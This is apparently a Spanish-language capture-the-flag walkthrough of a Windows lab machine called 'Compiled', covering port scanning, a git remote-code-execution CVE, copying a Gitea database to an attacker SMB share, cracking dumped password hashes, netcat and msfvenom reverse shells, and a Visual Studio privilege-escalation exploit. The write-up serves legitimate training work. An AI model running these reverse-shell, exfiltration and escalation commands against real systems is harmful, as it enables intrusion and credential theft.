Compiled
Windows · Medium

Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE   REASON
3000/tcp open  ppp       syn-ack ttl 127
5000/tcp open  upnp      syn-ack ttl 127
5985/tcp open  wsman     syn-ack ttl 127
7680/tcp open  pando-pub syn-ack ttl 127

3000 y 5000 son servers web

en 3000 hay un gitea

en el 5000 una web que pone compile your code

Compile your code
Enter Git Repository URL:

Invalid Git repository URL. It must start with "http://" and end with ".git".

hay 2 repos richard calculator y Compiled

Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 303) [Size: 38] [--> /user/login]
/issues               (Status: 303) [Size: 38] [--> /user/login]
/v2                   (Status: 401) [Size: 50]
/explore              (Status: 303) [Size: 41] [--> /explore/repos]
/administrator        (Status: 200) [Size: 16827]
/milestones           (Status: 303) [Size: 38] [--> /user/login]
/richard              (Status: 200) [Size: 22060]
/notifications        (Status: 303) [Size: 38] [--> /user/login]
/Richard              (Status: 200) [Size: 22060]
/Administrator        (Status: 200) [Size: 16829]
Progress: 220560 / 220561 (100.00%)
===============================================================

Probamos subdominios con wfuzz

Tras revisar un poco parece ser

CVE-2024-32002
https://amalmurali.me/posts/git-rce/

Pues básicamente creamos 2 repos, repo1 y repo2

habrá que cambiar el ususario si no te llamas abc

y ejecutas el exploit y en la maquina del peurto 5000 ejecutas el repo2 git para compilar

la shell que usamos una powershell -e base64

https://www.revshells.com/

Pues Entramos

    Directory: C:\Users


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----          7/4/2024  12:53 PM                Administrator                                                        
d-----          7/4/2024  12:55 PM                Emily                                                                
d-r---         1/20/2024   1:33 AM                Public                                                               
d-----         8/12/2024  12:06 AM                Richard   

metemos el winpeas y examinamos el sistema

pues hacemos el server y nos enviamos un archivo gitea.db

sudo impacket-smbserver -smb2support share .
copy gitea.db \\10.10.16.25\share

richardrichardrichard@compiled.htbenabled4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5epbkdf2$50000$502be54ff86f147c6cb9b55c8061d82d03d7cf2c96277dd16d95ed5c33bb524b62en-USfN5:f?{?f?{??richard@
emilyemilyemily@compiled.htbenabled97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16pbkdf2$50000$500056552f6f2df0015762a4419b0748de227d873cca89103cd83a976bdac52486fP??fP???emily@compiled.htbarc-green

bueno tenemos los pass de richard y emily

el salt sería 227d873cca89103cd83a976bdac52486
el hash sería 97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16

es un pbkdf2_hash
aquí acabo generando los hashes de rockyou y probando si coincide
el pass es 12345678

-----------

Bueno tuve que cortar durante unos dias y voy a retomar la máquina

Como tengo la clave de Emily voy a intentar seguir desde ahí

De hecho no había entregado el flag, así que aprovecho para entregarlo

Lo primero hago una reverse shell estoy con evilwinrm y tengo problemas con el runascs así que me bajo psexec

./PsExec.exe -accepteula
./PsExec.exe -u emily -p 12345678 .\nc.exe 10.10.16.11 4455 -> pero me da error

Parece que así si va
./PsExec.exe -u emily -p 12345678 -c 'nc.exe 10.10.16.11 4455'

Para escalar privilegios busco el exploit de VSStandardCollectorService150
https://github.com/Wh04m1001/CVE-2024-20656

Hay que hacer unos pequeños cambios al exploit en las primeras líneas cambiar

L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";

y

CopyFile(L"c:\\tmp\\exploit.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);

Sencillamente ajustamos las rutas y compilamos en visual studio

upload del ejecutable compilado

msfvenom -p windows/shell_reverse_tcp lhost=10.10.16.25 lport=4456 -f exe > e.exe
y upload en c:\temp\e.exe

ponemos a escuchar nc en el puerto 4456
o con msfconsole
use exploit/multi/handler 
set LHOST y LPORT
y run
probamos e.exe antes ejecutar el exploit

./runas.exe emily 12345678 "c:/tmp/expl.exe"

la verdad es que tarda un poco, si no funciona lo mejor es quizás reiniciar la máquina y empezar desde evilwinrm que es un segundo hacer upload a todo

Y por fin tenemos nt authority system y cogemos la flag

Sinceramente la máquina no es díficil en el tema de los exploits, pero se me complicó al no crear bien la rshell que se me cerraba y no entiendo el motivo, quizás algún problema en el puerto que tenía antes
